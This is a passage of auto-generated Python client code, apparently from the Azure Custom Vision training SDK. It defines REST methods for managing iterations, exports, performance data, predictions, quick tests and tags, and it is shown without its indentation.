deserialized = self._deserialize('Iteration', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}'}
def delete_iteration(
self, project_id, iteration_id, custom_headers=None, raw=False, **operation_config):
"""Delete a specific iteration of a project.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id.
:type iteration_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_iteration.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}'}
def update_iteration(
self, project_id, iteration_id, name, custom_headers=None, raw=False, **operation_config):
"""Update a specific iteration.
:param project_id: Project id.
:type project_id: str
:param iteration_id: Iteration id.
:type iteration_id: str
:param name: Gets or sets the name of the iteration.
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Iteration or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Iteration
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
updated_iteration = models.Iteration(name=name)
# Construct URL
url = self.update_iteration.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(updated_iteration, 'Iteration')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Iteration', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
update_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}'}
def get_exports(
self, project_id, iteration_id, custom_headers=None, raw=False, **operation_config):
"""Get the list of exports for a specific iteration.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id.
:type iteration_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Export]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_exports.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Export]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_exports.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/export'}
def export_iteration(
self, project_id, iteration_id, platform, flavor=None, custom_headers=None, raw=False, **operation_config):
"""Export a trained iteration.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id.
:type iteration_id: str
:param platform: The target platform. Possible values include:
'CoreML', 'TensorFlow', 'DockerFile', 'ONNX', 'VAIDK'
:type platform: str
:param flavor: The flavor of the target platform. Possible values
include: 'Linux', 'Windows', 'ONNX10', 'ONNX12', 'ARM',
'TensorFlowNormal', 'TensorFlowLite'
:type flavor: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Export or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Export or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.export_iteration.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['platform'] = self._serialize.query("platform", platform, 'str')
if flavor is not None:
query_parameters['flavor'] = self._serialize.query("flavor", flavor, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Export', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
export_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/export'}
def get_iteration_performance(
self, project_id, iteration_id, threshold=None, overlap_threshold=None, custom_headers=None, raw=False, **operation_config):
"""Get detailed performance information about an iteration.
:param project_id: The id of the project the iteration belongs to.
:type project_id: str
:param iteration_id: The id of the iteration to get.
:type iteration_id: str
:param threshold: The threshold used to determine true predictions.
:type threshold: float
:param overlap_threshold: If applicable, the bounding box overlap
threshold used to determine true predictions.
:type overlap_threshold: float
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: IterationPerformance or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.IterationPerformance
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_iteration_performance.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if threshold is not None:
query_parameters['threshold'] = self._serialize.query("threshold", threshold, 'float')
if overlap_threshold is not None:
query_parameters['overlapThreshold'] = self._serialize.query("overlap_threshold", overlap_threshold, 'float')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('IterationPerformance', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_iteration_performance.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/performance'}
def get_image_performances(
self, project_id, iteration_id, tag_ids=None, order_by=None, take=50, skip=0, custom_headers=None, raw=False, **operation_config):
"""Get image with its prediction for a given project iteration.
This API supports batching and range selection. By default it will only
return first 50 images matching images.
Use the {take} and {skip} parameters to control how many images to
return in a given batch.
The filtering is on an and/or relationship. For example, if the
provided tag ids are for the "Dog" and
"Cat" tags, then only images tagged with Dog and/or Cat will be
returned.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id. Defaults to workspace.
:type iteration_id: str
:param tag_ids: A list of tags ids to filter the images. Defaults to
all tagged images when null. Limited to 20.
:type tag_ids: list[str]
:param order_by: The ordering. Defaults to newest. Possible values
include: 'Newest', 'Oldest'
:type order_by: str
:param take: Maximum number of images to return. Defaults to 50,
limited to 256.
:type take: int
:param skip: Number of images to skip before beginning the image
batch. Defaults to 0.
:type skip: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.ImagePerformance]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_image_performances.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if tag_ids is not None:
query_parameters['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',', max_items=20, min_items=0)
if order_by is not None:
query_parameters['orderBy'] = self._serialize.query("order_by", order_by, 'str')
if take is not None:
query_parameters['take'] = self._serialize.query("take", take, 'int', maximum=256, minimum=0)
if skip is not None:
query_parameters['skip'] = self._serialize.query("skip", skip, 'int')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[ImagePerformance]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_image_performances.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/performance/images'}
def get_image_performance_count(
self, project_id, iteration_id, tag_ids=None, custom_headers=None, raw=False, **operation_config):
"""Gets the number of images tagged with the provided {tagIds} that have
prediction results from
training for the provided iteration {iterationId}.
The filtering is on an and/or relationship. For example, if the
provided tag ids are for the "Dog" and
"Cat" tags, then only images tagged with Dog and/or Cat will be
returned.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id. Defaults to workspace.
:type iteration_id: str
:param tag_ids: A list of tags ids to filter the images to count.
Defaults to all tags when null.
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: int or ClientRawResponse if raw=true
:rtype: int or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_image_performance_count.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if tag_ids is not None:
query_parameters['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('int', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_image_performance_count.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/performance/images/count'}
def publish_iteration(
self, project_id, iteration_id, publish_name, prediction_id, custom_headers=None, raw=False, **operation_config):
"""Publish a specific iteration.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id.
:type iteration_id: str
:param publish_name: The name to give the published iteration.
:type publish_name: str
:param prediction_id: The id of the prediction resource to publish to.
:type prediction_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: bool or ClientRawResponse if raw=true
:rtype: bool or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.publish_iteration.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['publishName'] = self._serialize.query("publish_name", publish_name, 'str')
query_parameters['predictionId'] = self._serialize.query("prediction_id", prediction_id, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('bool', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
publish_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/publish'}
def unpublish_iteration(
self, project_id, iteration_id, custom_headers=None, raw=False, **operation_config):
"""Unpublish a specific iteration.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id.
:type iteration_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.unpublish_iteration.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'iterationId': self._serialize.url("iteration_id", iteration_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
unpublish_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/publish'}
def delete_prediction(
self, project_id, ids, custom_headers=None, raw=False, **operation_config):
"""Delete a set of predicted images and their associated prediction
results.
:param project_id: The project id.
:type project_id: str
:param ids: The prediction ids. Limited to 64.
:type ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_prediction.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['ids'] = self._serialize.query("ids", ids, '[str]', div=',', max_items=64, min_items=0)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_prediction.metadata = {'url': '/projects/{projectId}/predictions'}
def query_predictions(
self, project_id, query, custom_headers=None, raw=False, **operation_config):
"""Get images that were sent to your prediction endpoint.
:param project_id: The project id.
:type project_id: str
:param query: Parameters used to query the predictions. Limited to
combining 2 tags.
:type query:
~azure.cognitiveservices.vision.customvision.training.models.PredictionQueryToken
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PredictionQueryResult or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.PredictionQueryResult
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.query_predictions.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(query, 'PredictionQueryToken')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PredictionQueryResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
query_predictions.metadata = {'url': '/projects/{projectId}/predictions/query'}
def quick_test_image(
self, project_id, image_data, iteration_id=None, store=True, custom_headers=None, raw=False, **operation_config):
"""Quick test an image.
:param project_id: The project id.
:type project_id: str
:param image_data: Binary image data. Supported formats are JPEG, GIF,
PNG, and BMP. Supports images up to 6MB.
:type image_data: Generator
:param iteration_id: Optional. Specifies the id of a particular
iteration to evaluate against.
The default iteration for the project will be used when not specified.
:type iteration_id: str
:param store: Optional. Specifies whether or not to store the result
of this prediction. The default is true, to store.
:type store: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImagePrediction or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImagePrediction
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.quick_test_image.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
if store is not None:
query_parameters['store'] = self._serialize.query("store", store, 'bool')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'multipart/form-data'
if custom_headers:
header_parameters.update(custom_headers)
# Construct form data
form_data_content = {
'imageData': image_data,
}
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, form_content=form_data_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImagePrediction', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
quick_test_image.metadata = {'url': '/projects/{projectId}/quicktest/image'}
def quick_test_image_url(
self, project_id, url, iteration_id=None, store=True, custom_headers=None, raw=False, **operation_config):
"""Quick test an image url.
:param project_id: The project to evaluate against.
:type project_id: str
:param url: Url of the image.
:type url: str
:param iteration_id: Optional. Specifies the id of a particular
iteration to evaluate against.
The default iteration for the project will be used when not specified.
:type iteration_id: str
:param store: Optional. Specifies whether or not to store the result
of this prediction. The default is true, to store.
:type store: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImagePrediction or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImagePrediction
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
image_url = models.ImageUrl(url=url)
# Construct URL
url = self.quick_test_image_url.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
if store is not None:
query_parameters['store'] = self._serialize.query("store", store, 'bool')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(image_url, 'ImageUrl')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImagePrediction', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
quick_test_image_url.metadata = {'url': '/projects/{projectId}/quicktest/url'}
def get_tags(
self, project_id, iteration_id=None, custom_headers=None, raw=False, **operation_config):
"""Get the tags for a given project and iteration.
:param project_id: The project id.
:type project_id: str
:param iteration_id: The iteration id. Defaults to workspace.
:type iteration_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Tag]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_tags.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Tag]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_tags.metadata = {'url': '/projects/{projectId}/tags'}
def create_tag(
self, project_id, name, description=None, type=None, custom_headers=None, raw=False, **operation_config):
"""Create a tag for the project.
:param project_id: The project id.
:type project_id: str
:param name: The tag name.
:type name: str
:param description: Optional description for the tag.
:type description: str
:param type: Optional type for the tag. Possible values include:
'Regular', 'Negative'
:type type: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Tag or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Tag or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.create_tag.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['name'] = self._serialize.query("name", name, 'str')
if description is not None:
query_parameters['description'] = self._serialize.query("description", description, 'str')
if type is not None:
query_parameters['type'] = self._serialize.query("type", type, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Tag', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_tag.metadata = {'url': '/projects/{projectId}/tags'}
def get_tag(
self, project_id, tag_id, iteration_id=None, custom_headers=None, raw=False, **operation_config):
"""Get information about a specific tag.
:param project_id: The project this tag belongs to.
:type project_id: str
:param tag_id: The tag id.
:type tag_id: str
:param iteration_id: The iteration to retrieve this tag from.
Optional, defaults to current training set.
:type iteration_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Tag or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Tag or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_tag.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'tagId': self._serialize.url("tag_id", tag_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if iteration_id is not None:
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Tag', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_tag.metadata = {'url': '/projects/{projectId}/tags/{tagId}'}
def delete_tag(
self, project_id, tag_id, custom_headers=None, raw=False, **operation_config):
"""Delete a tag from the project.
:param project_id: The project id.
:type project_id: str
:param tag_id: Id of the tag to be deleted.
:type tag_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_tag.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'tagId': self._serialize.url("tag_id", tag_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_tag.metadata = {'url': '/projects/{projectId}/tags/{tagId}'}
def update_tag(
